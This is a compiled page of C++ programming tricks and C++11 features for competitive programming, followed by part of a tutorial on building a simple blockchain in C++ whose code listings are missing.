  5. //you can also change the values using
  6. vector<int> vs;
  7. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  8. for (auto& it: vs) it*=3;
  9. for (auto it: vs)
  10. cout << it << ‘ ‘;cout<<endl;

Declaring variable

  1. template<class A, class B>
  2. auto mult(A x, B y) -> decltype(x * y){
  3. return x * y;
  4. }
  5. int main(){
  6. auto a = 3 * 2; //the return type is the type of operator (x*y)
  7. cout<<a<<endl;
  8. return 0;
  9. }

The Power of Strings 

  1. int n,m;
  2. cin >> n >> m;
  3. int matrix[n+1][m+1];
  4. //This loop
  5. for(int i = 1; i <= n; i++) {
  6. for(int j = 1; j <= m; j++)
  7. cout << matrix[i][j] << » «;
  8. cout << «\n»;
  9. }
  10. // is equivalent to this
  11. for(int i = 1; i <= n; i++)
  12. for(int j = 1; j <= m; j++)
  13. cout << matrix[i][j] << » \n»[j == m];

because " \n" is a char*," \n"[0] is ' ' and " \n"[1] is '\n'  .

Some Hidden function
__gcd(x, y)
you don’t need to code gcd function.

  1. cout<<__gcd(54,48)<<endl; //return 6

__builtin_ffs(x)
This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.
e.g:  __builtin_ffs(10) = 2 because 10 is ‘…10 1 0′ in base 2 and first 1-bit from right is at index 1 (0-based) and function returns 1 + index.three)

Pairing tricks 

  1. pair<int, int> p;
  2. //This
  3. p = make_pair(1, 2);
  4. //equivalent to this
  5. p = {1, 2};
  6. //So
  7. pair<int, pair<char, long long> > p;
  8. //now easier
  9. p = {1, {‘a’, 2ll}};

Super include 
Simply use
#include <bits/stdc++.h>
This library includes many of libraries we do need  like algorithm, iostream, vector and many more. Believe me you don’t need to include anything else 😀 !!

Smart Pointers

Using smart pointers, we can make pointers to work in way that we don’t need to explicitly call delete. Smart pointer is a wrapper class over a pointer with operator like * and -> overloaded. The objects of smart pointer class look like pointer, but can do many things that a normal pointer can’t like automatic destruction (yes, we don’t have to explicitly use delete), reference counting and more.
The idea is to make a class with a pointer, destructor and overloaded operators like * and ->. Since destructor is automatically called when an object goes out of scope, the dynamically alloicated memory would automatically deleted (or reference count can be decremented).


You can put URIs in your C++ code and the compiler will not throw any error.

  1. #include <iostream>
  2. int main() {
  3. using namespace std;
  4. http://www.google.com
  5. int x = 5;
  6. cout << x;
  7. }

Explanation: Any identifier followed by a : becomes a (goto) label in C++. Anything followed by // becomes a comment so in the code above, http is a label and //google.com/is a comment. The compiler might throw a warning however, since the label is unutilized.


Don’t Confuse Assign (=) with Test-for-Equality (==).

This one is elementary, although it might have baffled Sherlock Holmes. The following looks innocent and would compile and run just fine if C++ were more like BASIC:

if (a = b)
cout << «a is equal to b.»;

Because this looks so innocent, it creates logic errors requiring hours to track down within a large program unless you’re on the lookout for it. (So when a program requires debugging, this is the first thing I look for.) In C and C++, the following is not a test for equality:

a = b

What this does, of course, is assign the value of b to a and then evaluate to the value assigned.
The problem is that a = b does not generally evaluate to a reasonable true/false condition—with one major exception I’ll mention later. But in C and C++, any numeric value can be used as a condition for “if” or “while.
Assume that a and b are set to 0. The effect of the previously-shown if statement is to place the value of b into a; then the expression a = b evaluates to 0. The value 0 equates to false. Consequently, aand b are equal, but exactly the wrong thing gets printed:

if (a = b)     // THIS ENSURES a AND b ARE EQUAL…
cout << «a and b are equal.»;
else
cout << «a and b are not equal.»;  // BUT THIS GETS PRINTED!

The solution, of course, is to use test-for-equality when that’s what you want. Note the use of double equal signs (==). This is correct inside a condition.

// CORRECT VERSION:
if (a == b)
cout << «a and b are equal.»;


The most amazing trick i found was a status of someone’s topcoder profile:
Code:
#include <cstdio>
double m[]= {7709179928849219.0, 771};
int main()
{
m[1]—?m[0]*=2,main():printf((char*)m);
}
You will be seriously amazed by the ouput…here it is:
C++Sucks

I tried to analyse the code and came up with a reason but not an exact explanation..so i tried to ask it on stackoverflow..you can go through the explanation here:
Concept behind this 4 lines tricky C++ code
Read it and you will learn something you wouldn’t have even thought of… 😉


  1. static const unsigned char BitsSetTable256[256] =
  2. {
  3. # define B2(n) n, n+1, n+1, n+2
  4. # define B4(n) B2(n), B2(n+1), B2(n+1), B2(n+2)
  5. # define B6(n) B4(n), B4(n+1), B4(n+1), B4(n+2)
  6. B6(0), B6(1), B6(1), B6(2)
  7. };
  8. unsigned int v; // count the number of bits set in 32-bit value v
  9. unsigned int c; // c is the total bits set in v
  10. // Option 1:
  11. c = BitsSetTable256[v & 0xff] +
  12. BitsSetTable256[(v >> 8) & 0xff] +
  13. BitsSetTable256[(v >> 16) & 0xff] +
  14. BitsSetTable256[v >> 24];
  15. // Option 2:
  16. unsigned char * p = (unsigned char *) &v;
  17. c = BitsSetTable256[p[0]] +
  18. BitsSetTable256[p[1]] +
  19. BitsSetTable256[p[2]] +
  20. BitsSetTable256[p[3]];
  21. // To initially generate the table algorithmically:
  22. BitsSetTable256[0] = 0;
  23. for (int i = 0; i < 256; i++)
  24. {
  25. BitsSetTable256[i] = (i & 1) + BitsSetTable256[i / 2];
  26. }

 

 

  1. float Q_rsqrt( float number )
  2. {
  3. long i;
  4. float x2, y;
  5. const float threehalfs = 1.5F;
  6. x2 = number * 0.5F;
  7. y = number;
  8. i = * ( long * ) &y; // evil floating point bit level hacking
  9. i = 0x5f3759df - ( i >> 1 ); // what the fuck?
  10. y = * ( float * ) &i;
  11. y = y * ( threehalfs - ( x2 * y * y ) ); // 1st iteration
  12. // y = y * ( threehalfs - ( x2 * y * y ) ); // 2nd iteration, this can be removed
  13. return y;
  14. }

Iteration: 

  1. #define FOR(i,n) for(int (i)=0;(i)<(n);(i)++)
  2. #define FORR(i,a,b) for(int (i)=(a);(i)<(b);(i)++)
  3. //reverse
  4. #define REV(i,n) for(int (i)=(n)-1;(i)>=0;(i)--)

Handy way to use it like this. 

  1. typedef long long int int64;
  2. typedef unsigned long long int uint64;

FastIO for +ve integers.

    1. inline void frint(int *a){
    2. register char c=0;while (c<33) c=getchar_unlocked();*a=0;
    3. while (c>33){*a=*a*10+c-'0';c=getchar_unlocked();}
    4. }

Try This….

#include <iostream>
using namespace std;
int main()
{
int a,b,c;
int count = 1;
for (b=c=10;a=»- FIGURE?, UMKC,XYZHello Folks,\
TFy!QJu ROo TNn(ROo)SLq SLq ULo+\
UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\
NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\
HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\
T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\
Hq!WFs XDt!» [b+++21]; )
for(; a— > 64 ; )
putchar ( ++c==’Z’ ? c = c/ 9:33^b&1);
return 0;
}


I think one of the coolest of all time, is defining an abstract base class in C++, and inheriting from it in python, and passing it back to C++ to call.
It actually works

  1. struct Interface{
  2. int foo()const=0;
  3. virtual ~Interface(){}
  4. };
  5. void call(Interface const& f){
  6. std::cout<<f.foo()<<std::endl;
  7. }
  8. struct InterfaceWrap final: Interface, boost::python::wrapper<Interface>
  9. {
  10. int foo() const final
  11. {
  12. return this->get_override("foo")();
  13. }
  14. };
  15. BOOST_PYTHON_MODULE(interface){
  16. using namespace boost::python;
  17. class_<Interface ,boost ::noncopyable,boost::shared_ptr<Interface>>("_InterfaceCpp",no_init)
  18. .def("foo",&Interface::foo)
  19. ;
  20. class_<InterfaceWrap ,bases<Interface>,boost::shared_ptr<InterfaceWrap>>("Interface",init<>())
  21. ;
  22. def("call",&call);
  23. }

and then

  1. import interface as i # C++ code
  2. class impl(i.Interface):#inherit from C++ class
  3. def __init__(self):
  4. i.Interface.__init__(self)
  5. def foo(self):
  6. return 100
  7. i.call(impl())#call C++ function with Python derived class

This does exactly what you think it should do.


void qsort ( void * base, size_t num, size_t size, int ( * compar ) ( const void *, const void * ) )

base Pointer to the first element of the array to be sorted.

num Number of elements in the array pointed by base. size_t is an unsigned integral type.

size Size in bytes of each element in the array. size_t is an unsigned integral type.

compar Function that compares two elements. This function is called repeatedly by qsorttocomparetwoelements.It shall follow the following prototype:

int compar ( const void * elem1, const void * elem2 );

Taking a pointer to two pointers as arguments (both type-casted to const void*). The function should compare the data pointed by both: if they match in ranking, the function shall return zero; if elem1 goes before elem2, it shall return a negative value; and if it goes after, a positive value.

Eg :

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b) { return ( *(int*)a — *(int*)b ); }

int main () {
int n;
qsort (values, 6, sizeof(int), compare);
for (n=0; n<6; n++) printf («%d «,values[n]); return 0; }


Partial template specialization

C++11 has this cool function get<J> which can be used to access the first and second member of a pair, with a different syntax:

  1. std::pair < std::string, double > pr ( «pi», 3.14 );
  2. std::cout << std::get < 0 > ( pr ); // outputs «pi»
  3. std::cout << std::get < 1 > ( pr ); // outputs 3.14

Note that this is a function and not a function object or a member function.

I do not find it trivial to write a function

  • with three template types template < size_t J, class T1, class T2 >
  • which can get std::pair < T1, T2 > as an argument
  • and outputs pr.first if the template value J is 0
  • and outputs pr.second if the template value J is 1.

In particular consider that in C++ one cannot overload a function based on its return type. So what should the return type of this function be declared as? T1 or T2?

  1. template < size_t J, class T1, class T2>
  2. ??? get ( std::pair < T1, T2 > & );

The interesting thing is that one could already write this function in C++98 using Partial template specialization, which is a really cool trick. The problem is that function templates cannot be partially specialized, but this is easy to solve:

  1. namespace
  2. {
  3. /*!
  4. * helper template to do the work with partial specialization
  5. */
  6. template < size_t J, class T1, class T2 >
  7. struct Get;
  8. template < class T1, class T2>
  9. struct Get < 0, T1, T2 >
  10. {
  11. typedef typename std::pair < T1, T2 >::first_type result_type;
  12. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.first; }
  13. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.first; }
  14. };
  15. template < class T1, class T2>
  16. struct Get < 1, T1, T2 >
  17. {
  18. typedef typename std::pair < T1, T2 >::second_type result_type;
  19. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.second; }
  20. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.second; }
  21. };
  22. }
  23. template < size_t J, class T1, class T2 >
  24. typename Get< J, T1, T2 >::result_type & get ( std::pair< T1, T2 > & pr )
  25. {
  26. return Get < J, T1, T2 >::elm( pr );
  27. }
  28. template < size_t J, class T1, class T2 >
  29. const typename Get< J, T1, T2 >::result_type & get ( const std::pair< T1, T2 > & pr )
  30. {
  31. return Get < J, T1, T2 >::elm( pr );
  32. }

Define operator<< for STL structures to make it easy to add debug outputs to your code. (This is better than special printing functions because it nests automatically! Printing a map< vector<int>, int> works without any additional effort if you can print any map and any vector.)

Additionally, define a macro that makes nicer debug outputs and makes it easy to turn them off using the standard mechanism (same one that is used for assert). Here’s a short example how to do all of this in C++11:

  1. #include <iostream>
  2. #include <string>
  3. #include <map>
  4. #ifdef NDEBUG
  5. #define DEBUG(var)
  6. #else
  7. #define DEBUG(var) { std::cout << #var << ": " << (var) << std::endl; }
  8. #endif
  9. template<typename T1, typename T2>
  10. std::ostream& operator<< (std::ostream& out, const std::map<T1,T2> &M) {
  11. out << "{ ";
  12. for (auto item:M) out << item.first << "->" << item.second << ", ";
  13. out << "}";
  14. return out;
  15. }
  16. int main() {
  17. std::map<std::string,int> age = { {"Joe",47}, {"Bob",22}, {"Laura",19} };
  18. DEBUG(age);
  19. }

This is a very amazing piece of code:

main(a){printf(a,34,a=»main(a){printf(a,34,a=%c%s%c,34);}»,34);}

It is the shortest C++ code which when executed prints itself. It was discovered by Vlad Taeerov and Rashit Fakhreyev and is only 64 characters in length(Making it the shortest).


To Convert list<T> to vector<T>:

  1. std::vector<T> v(l.begin(), l.end());

 

Variadic Templates :

They can be useful in places. You can pass any number of parameters .
Example  :

  1. #include <iostream>
  2. #include <bitset>
  3. #include <string>
  4. using namespace std;
  5.  
  6. void print() {
  7. cout<<«Nothing to print :)» ;
  8. }
  9.  
  10. template<typename T,typename args>
  11. void print(T x,args y) {
  12. cout<<x<<endl;
  13. print(y…);
  14. }
  15.  
  16. int main() {
  17. print(10,14.56,«Quora»,bitset<20>(28));
  18. return 0;
  19. }

 

Code on ideon : http://ideone.com/b8TNHD

Output :

  1. 10
  2. 14.56
  3. Quora
  4. 00000000000000011100
  5. Nothing to print 🙂

 

Range based for loops can be used with some STL containers :
eg.

 

  1. #include <iostream>
  2. #include <list>
  3. #include <vector>
  4.  
  5. using namespace std;
  6.  
  7. int main() {
  8. list<int> x;
  9. x.push_back(10);
  10. x.push_back(20);
  11. for(auto i : x)
  12. cout<<i;
  13. return 0;
  14. }

Old but still C++ Tricks

I see lots of programmers write code like this one:

pair<int, int> p;
vector<int> v;
// ...
p = make_pair(3, 4);
v.push_back(4); v.push_back(5);

while you can just do this:

pair<int, int> p;
vector<int> v;
// ...
p = {3, 4};
v = {4, 5};

1. Assign value by a pair of {} to a container

I see lots of programmers write code like this one:

pair<int, int> p;
// ...
p = make_pair(3, 4);

while you can just do this:

pair<int, int> p;
// ...
p = {3, 4};

even a more complex pair

pair<int, pair<char, long long> > p;
// ...
p = {3, {'a', 8ll}};

What about vectordequeset and other containers?


vector<int> v;
v = {1, 2, 5, 2};
for (auto i: v)
    cout << i << ' ';
cout << '\n';
// prints "1 2 5 2"


deque<vector<pair<int, int>>> d;
d = {{{3, 4}, {5, 6}}, {{1, 2}, {3, 4}}};
for (auto i: d) {
    for (auto j: i)
        cout << j.first << ' ' << j.second << '\n';
    cout << "-\n";
}
// prints "3 4
//         5 6
//         -
//	   1 2
//	   3 4
//	   -"


set<int> s;
s = {4, 6, 2, 7, 4};
for (auto i: s)
    cout << i << ' ';
cout << '\n';
// prints "2 4 6 7"


list<int> l;
l = {5, 6, 9, 1};
for (auto i: l)
    cout << i << ' ';
cout << '\n';
// prints "5 6 9 1"


array<int, 4> a;
a = {5, 8, 9, 2};
for (auto i: a)
    cout << i << ' ';
cout << '\n';
// prints "5 8 9 2"


tuple<int, int, char> t;
t = {3, 4, 'f'};
cout << get<2>(t) << '\n';

Note that it doesn’t work for stack and queue.

2. Name of argument in macros

You can use ‘#’ sign to get exact name of an argument passed to a macro:

#define what_is(x) cerr << #x << " is " << x << endl;
// ...
int a_variable = 376;
what_is(a_variable);
// prints "a_variable is 376"
what_is(a_variable * 2 + 1)
// prints "a_variable * 2 + 1 is 753"

3. Get rid of those includes!

Simply use

#include <bits/stdc++.h>

This library includes many of libraries we do need in contest like algorithmiostreamvector and many more. Believe me you don’t need to include anything else!

4. Hidden function (not really hidden but not used often)

one)

__gcd(value1, value2)

You don’t need to code Euclidean Algorithm for a gcd function, from now on we can use. This function returns gcd of two numbers.

e.g. __gcd(18, 27) = 9.

two)

__builtin_ffs(x)

This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.

e.g. __builtin_ffs(10) = 2 because 10 is ‘…10 1 0′ in base 2 and first 1-bit from right is at index 1 (0-based) and function returns 1 + index.

three)

__builtin_clz(x)

This function returns number of leading 0-bits of x which starts from most significant bit position. x is unsigned int and like previous function this function with suffix ‘l gets a unsigned long argument and with suffix ‘ll’ gets a unsigned long long argument. If x == 0, returns an undefined value.

e.g. __builtin_clz(16) = 27 because 16 is ‘  10000′. Number of bits in a unsigned int is 32. so function returns 32 — 5 = 27.

four)

__builtin_ctz(x)

This function returns number of trailing 0-bits of x which starts from least significant bit position. x is unsigned int and like previous function this function with suffix ‘l’ gets a unsigned long argument and with suffix ‘ll’ gets a unsigned long long argument. If x == 0, returns an undefined value.

e.g. __builtin_ctz(16) = 4 because 16 is ‘…1 0000 ‘. Number of trailing 0-bits is 4.

five)

__builtin_popcount(x)

This function returns number of 1-bits of x. x is unsigned int and like previous function this function with suffix ‘l’ gets a unsigned long argument and with suffix ‘ll’ gets a unsigned long long argument. If x == 0, returns an undefined value.

e.g. __builtin_popcount(14) = 3 because 14 is ‘… 111 0′ and has three 1-bits.

Note: There are other __builtin functions too, but they are not as useful as these ones.

Note: Other functions are not unknown to bring them here but if you are interested to work with them, I suggest this website.

5. Variadic Functions and Macros

We can have a variadic function. I want to write a sum function which gets a number of ints, and returns sum of them. Look at the code below:

int sum() { return 0; }

template<typename... Args>
int sum(int a, Args... args) { return a + sum(args...); }

int main() { cout << sum(5, 7, 2, 2) + sum(3, 4); /* prints "23" */ }

In the code above I used a template. sum(5, 7, 2, 2) becomes 5 + sum(7, 2, 2) then sum(7, 2, 2), itself, becomes 7 + sum(2, 2) and so on… I also declare another sum function which gets 0 arguments and returns 0.

I can even define a any-type sum function:

int sum() { return 0; }

template<typename T, typename... Args>
T sum(T a, Args... args) { return a + sum(args...); }

int main() { cout << sum(5, 7, 2, 2) + sum(3.14, 4.89); /* prints "24.03" */ }

Here, I just changed int to T and added typename T to my template.

In C++14 you can also use auto sum(T a, Args... args) in order to get sum of mixed types. (Thanks to slycelote and Corei13)

We can also use variadic macros:

#define a_macro(args...) sum(args...)

int sum() { return 0; }

template<typename T, typename... Args>
auto sum(T a, Args... args) { return a + sum(args...); }

int main() { cout << a_macro(5, 7, 2, 2) + a_macro(3.14, 4.89); /* prints "24.03" */ }

Using these 2, we can have a great debugging function: (thanks to Igorjan94) — Updated!

#include <bits/stdc++.h>

using namespace std;

#define error(args...) { string _s = #args; replace(_s.begin(), _s.end(), ',', ' '); stringstream _ss(_s); istream_iterator<string> _it(_ss); err(_it, args); }

void err(istream_iterator<string> it) {}
template<typename T, typename... Args>
void err(istream_iterator<string> it, T a, Args... args) {
	cerr << *it << " = " << a << endl;
	err(++it, args...);
}

int main() {
	int a = 4, b = 8, c = 9;
	error(a, b, c);
}

Output:

a = 4
b = 8
c = 9

This function helps a lot in debugging.

6. Here is C++0x in CF, why still C++?

Variadic functions also belong to C++11 or C++0x, In this section I want to show you some great features of C++11.

one) Range-based For-loop

Here is a piece of an old code:

set<int> s = {8, 2, 3, 1};
for (set<int>::iterator it = s.begin(); it != s.end(); ++it)
    cout << *it << ' ';
// prints "1 2 3 8"

Trust me, that’s a lot of code for that, just use this:

set<int> s = {8, 2, 3, 1};
for (auto it: s)
    cout << it << ' ';
// prints "1 2 3 8"

We can also change the values just change auto with auto &:

vector<int> v = {8, 2, 3, 1};
for (auto &it: v)
    it *= 2;
for (auto it: v)
    cout << it << ' ';
// prints "16 4 6 2"

two) The Power of auto

You don’t need to name the type you want to use, C++11 can infer it for you. If you need to loop over iterators of a set<pair<int, pair<int, int> > > from begin to end, you need to type set<pair<int, pair<int, int> > >::iterator for me it’s so suffering! just use auto it = s.begin()

also x.begin() and x.end() now are accessible using begin(x) and end(x).

There are more things. I think I said useful features. Maybe I add somethings else to post. If you know anything useful please share with Codeforces community 🙂

From Ximera‘s comment:

this code:

for(i = 1; i <= n; i++) {
    for(j = 1; j <= m; j++)
        cout << a[i][j] << " ";
    cout << "\n";
}

is equivalent to this:

for(i = 1; i <= n; i++)
    for(j = 1; j <= m; j++)
        cout << a[i][j] << " \n"[j == m];

And here is the reason: " \n" is a char*" \n"[0] is ' ' and " \n"[1] is '\n'.

From technetium28‘s comment:

Usage of tie and emplace_back:

#define mt make_tuple
#define eb emplace_back
typedef tuple<int,int,int> State; // operator< defined

int main(){
  int a,b,c;
  tie(a,b,c) = mt(1,2,3); // assign
  tie(a,b) = mt(b,a); // swap(a,b)

  vector<pair<int,int>> v;
  v.eb(a,b); // shorter and faster than pb(mp(a,b))

  // Dijkstra
  priority_queue<State> q;
  q.emplace(0,src,-1);
  while(q.size()){
    int dist, node, prev;
    tie(dist, ode, prev) = q.top(); q.pop();
    dist = -dist;
    // ~~ find next state ~~
    q.emplace(-new_dist, new_node, node);
  }
}

And that’s why emplace_back faster: emplace_back is faster than push_back ’cause it just construct value at the end of vector but push_back construct it somewhere else and then move it to the vector.

Also in the code above you can see how tie(args...) works. You can also use ignore keyword in tie to ignore a value:

tuple<int, int, int, char> t (3, 4, 5, 'g');
int a, b;
tie(b, ignore, a, ignore) = t;
cout << a << ' ' << b << '\n';

Output: 5 3

I use this macro and I love it:

#define rep(i, begin, end) for (__typeof(end) i = (begin) - ((begin) > (end)); i != (end) - ((begin) > (end)); i += 1 - 2 * ((begin) > (end)))

First of all, you don’t need to name the type you want to use. Second of all it goes forwards and backwards based on (begin > end) condition. e.g. rep(i, 1, 10) is 1, 2, …, 8, 9 and rep(i, 10, 1) is 9, 8, …, 2, 1

It works well with different types e.g.

vector<int> v = {4, 5, 6, 4, 8};
rep(it, end(v), begin(v))
    cout << *it << ' ';
// prints "8 4 6 5 4"

Also there is another great feature of C++11, lambda functions!

Lambdas are like other languages’ closure. It defines like this:

[capture list](parameters) -> return value { body }

one) Capture List: simple! We don’t need it here, so just put []

two) parameters: simple! e.g. int x, string s

three) return value: simple again! e.g. pair<int, int> which can be omitted most of the times (thanks to Jacob)

four) body: contains function bodies, and returns return value.

e.g.

auto f = [] (int a, int b) -> int { return a + b; };
cout << f(1, 2); // prints "3"

You can use lambdas in for_eachsort and many more STL functions:

vector<int> v = {3, 1, 2, 1, 8};
sort(begin(v), end(v), [] (int a, int b) { return a > b; });
for (auto i: v) cout << i << ' ';

Output:

8 3 2 1 1

From Igorjan94‘s comment:

Usage of move:

When you work with STL containers like vector, you can use move function to just move container, not to copy it all.

vector<int> v = {1, 2, 3, 4};
vector<int> w = move(v);

cout << "v: ";
for (auto i: v)
    cout << i << ' ';

cout << "\nw: ";
for (auto i: w)
    cout << i << ' ';

Output:

v: 
w: 1 2 3 4 

As you can see v moved to w and not copied.

7. C++0x Strings

one) Raw Strings (From IvayloS‘s comment)

You can have UTF-8 strings, Raw strings and more. Here I want to show raw strings. We define a raw string as below:

string s = R"(Hello, World!)"; // Stored: "Hello, World!"

A raw string skips all escape characters like \n or \". e.g.

string str = "Hello\tWorld\n";
string r_str = R"(Hello\tWorld\n)";
cout << str << r_str;

Output:

Hello	World
Hello\tWorld\n

You can also have multiple line raw string:

string r_str =
R"(Dear Programmers,
I'm using C++11
Regards, Swift!)";
cout << r_str;

Output:

Dear Programmer,
I'm using C++11
Regards, Swift!

two) Regular Expressions (regex)

Regular expressions are useful tools in programming, we can define a regular expression by regex e.g. regex r = "[a-z]+";. We will use raw string for them because sometimes they have \ and other characters. Look at the example:

regex email_pattern(R"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"); // This email pattern is not totally correct! It's correct for most emails.

string
valid_email("swift@codeforces.com"),
invalid_email("hello world");

if (regex_match(valid_email, email_pattern))
    cout << valid_email << " is valid\n";
else
    cout << valid_email << " is invalid\n";

if (regex_match(invalid_email, email_pattern))
    cout << invalid_email << " is valid\n";
else
    cout << invalid_email << " is invalid\n";

Output:

swift@codeforces.com is valid
hello world is invalid

Note: You can learn Regex in this website.

three) User-defined literals

You already know literals from C++ like: 0xA1000ll3.14f and so on…

Now you can have your own custom literals! Sounds great 🙂 So let’s see an example:

long long operator "" _m(unsigned long long literal) {
	return literal;
}

long double operator "" _cm(unsigned long long literal) {
	return literal / 100.0;
}

long long operator "" _km(unsigned long long literal) {
	return literal * 1000;
}

int main() {
	// See results in meter:
	cout << 250_m << " meters \n"; // Prints 250 meters
	cout << 12_km << " meters \n"; // Prints 12000 meters
	cout << 421_cm << " meters \n"; // Prints 4.21 meters
}

Note that a literal should start with an underscore (_). We declare a new literal by this pattern:

[returnType] operator "" _[name]([parameters]) { [body] }

note that parameters only can be one of these:

(const char *)

(unsigned long long int)

(long double)

(char)

(wchar_t)

(char16_t)

(char32_t)

(const char *, size_t)

(const wchar_t *, size_t)

(const char16_t *, size_t)

(const char32_t *, size_t)

Literals also can used with templates.

Build a blockchain with C++

So, you might have heard a lot about something called a blockchain lately and wondered what all the fuss is about. A blockchain is a ledger which has been written in such a way that updating the data contained within it becomes very difficult, some say the blockchain is immutable and to all intents and purposes they’re right but immutability suggests permanence and nothing on a hard drive could ever be considered permanent. Anyway, we’ll leave the philosophical debate to the non-techies; you’re looking for someone to show you how to write a blockchain in C++, so that’s exactly what I’m going to do.

Before I go any further, I have a couple of disclaimers:

  1. This tutorial is based on one written by Savjee using NodeJS; and
  2. It’s been a while since I wrote any C++ code, so I might be a little rusty.

The first thing you’ll want to do is open a new C++ project, I’m using CLion from JetBrains but any C++ IDE or even a text editor will do. For the interests of this tutorial we’ll call the project TestChain, so go ahead and create the project and we’ll get started.

If you’re using CLion you’ll see that the main.cpp file will have already been created and opened for you; we’ll leave this to one side for the time being.

Create a file called Block.h in the main project folder, you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Header File.

Inside the file, add the following code (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCK_H and #endif):

These lines above tell the compiler to include the cstdint, and iostream libraries.

Add this line below it:

This essentially creates a shortcut to the std namespace, which means that we don’t need to refer to declarations inside the stdnamespace by their full names e.g. std::string, but instead use their shortened names e.g. string.

So far, so good; let’s start fleshing things out a little more.

A blockchain is made up of a series of blocks which contain data and each block contains a cryptographic representation of the previous block, which means that it becomes very hard to change the contents of any block without then needing to change every subsequent one; hence where the blockchain essentially gets its immutable properties.

So let’s create our block class, add the following lines to the Block.h header file:

Unsurprisingly, we’re calling our class Block (line 1) followed by the public modifier (line 2) and public variable sPrevHash(remember each block is linked to the previous block) (line 3). The constructor signature (line 5) takes three parameters for nIndexIn, and sDataIn; note that the const keyword is used along with the reference modifier (&) so that the parameters are passed by reference but cannot be changed, this is done to improve efficiency and save memory. The GetHash method signature is specified next (line 7) followed by the MineBlock method signature (line 9), which takes a parameter nDifficulty. We specify the private modifier (line 11) followed by the private variables _nIndex, _nNonce, _sData, _sHash, and _tTime (lines 12–16). The signature for _CalculateHash (line 18) also has the const keyword, this is to ensure the output from the method cannot be changed which is very useful when dealing with a blockchain.

Now it’s time to create our Blockchain.h header file in the main project folder.

Let’s start by adding these lines (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCKCHAIN_H and #endif):

They tell the compiler to include the cstdint, and vector libraries, as well as the Block.h header file we have just created, and creates a shortcut to the std namespace.

Now let’s create our blockchain class, add the following lines to the Blockchain.h header file:

As with our block class, we’re keeping things simple and calling our blockchain class Blockchain (line 1) followed by the publicmodifier (line 2) and the constructor signature (line 3). The AddBlock signature (line 5) takes a parameter bNew which must be an object of the Block class we created earlier. We then specify the private modifier (line 7) followed by the private variables for _nDifficulty, and _vChain (lines 8–9) as well as the method signature for _GetLastBlock (line 11) which is also followed by the const keyword to denote that the output of the method cannot be changed.

Ain't nobody got time for that!Since blockchains use cryptography, now would be a good time to get some cryptographic functionality in our blockchain. We’re going to be using the SHA256 hashing technique to create hashes of our blocks, we could write our own but really – in this day and age of open source software – why bother?

To make my life that much easier, I copied and pasted the text for the sha256.h, sha256.cpp and LICENSE.txt files shown on the C++ sha256 function from Zedwood and saved them in the project folder.

Right, let’s keep going.

Create a source file for our block and save it as Block.cpp in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Source File.

Start by adding these lines, which tell the compiler to include the Block.h and sha256.h files we added earlier.

Follow these with the implementation of our block constructor:

The constructor starts off by repeating the signature we specified in the Block.h header file (line 1) but we also add code to copy the contents of the parameters into the the variables _nIndex, and _sData. The _nNonce variable is set to -1 (line 2) and the _tTime variable is set to the current time (line 3).

Let’s add an accessor for the block’s hash:

We specify the signature for GetHash (line 1) and then add a return for the private variable _sHash (line 2).

As you might have read, blockchain technology was made popular when it was devised for the Bitcoin digital currency, as the ledger is both immutable and public; which means that, as one user transfers Bitcoin to another user, a transaction for the transfer is written into a block on the blockchain by nodes on the Bitcoin network. A node is another computer which is running the Bitcoin software and, since the network is peer-to-peer, it could be anyone around the world; this process is called ‘mining’ as the owner of the node is rewarded with Bitcoin each time they successfully create a valid block on the blockchain.

To successfully create a valid block, and therefore be rewarded, a miner must create a cryptographic hash of the block they want to add to the blockchain that matches the requirements for a valid hash at that time; this is achieved by counting the number of zeros at the beginning of the hash, if the number of zeros is equal to or greater than the difficulty level set by the network that block is valid. If the hash is not valid a variable called a nonce is incremented and the hash created again; this process, called Proof of Work (PoW), is repeated until a hash is produced that is valid.

So, with that being said, let’s add the MineBlock method; here’s where the magic happens!

We start with the signature for the MineBlock method, which we specified in the Block.h header file (line 1), and create an array of characters with a length one greater that the value specified for nDifficulty (line 2). A for loop is used to fill the array with zeros, followed by the final array item being given the string terminator character (\0), (lines 3–6) then the character array or c-string is turned into a standard string (line 8). A do…while loop is then used (lines 10–13) to increment the _nNonce and _sHashis assigned with the output of _CalculateHash, the front portion of the hash is then compared the string of zeros we’ve just created; if no match is found the loop is repeated until a match is found. Once a match is found a message is sent to the output buffer to say that the block has been successfully mined (line 15).

We’ve seen it mentioned a few times before, so let’s now add the _CalculateHash method:

We kick off with the signature for the _CalculateHash method (line 1), which we specified in the Block.h header file, but we include the inline keyword which makes the code more efficient as the compiler places the method’s instructions inline wherever the method is called; this cuts down on separate method calls. A string stream is then created (line 2), followed by appending the values for _nIndex, _tTime, _sData, _nNonce, and sPrevHash to the stream (line 3). We finish off by returning the output of the sha256 method (from the sha256 files we added earlier) using the string output from the string stream (line 5).

Right, let’s finish off our blockchain implementation! Same as before, create a source file for our blockchain and save it as Blockchain.cpp in the main project folder.

Add these lines, which tell the compiler to include the Blockchain.h file we added earlier.

Follow these with the implementation of our blockchain constructor:

We start off with the signature for the blockchain constructor we specified in Blockchain.h (line 1). As a blocks are added to the blockchain they need to reference the previous block using its hash, but as the blockchain must start somewhere we have to create a block for the next block to reference, we call this a genesis block. A genesis block is created and placed onto the _vChain vector (line 2). We then set the _nDifficulty level (line 3) depending on how hard we want to make the PoW process.

Now it’s time to add the code for adding a block to the blockchain, add the following lines:

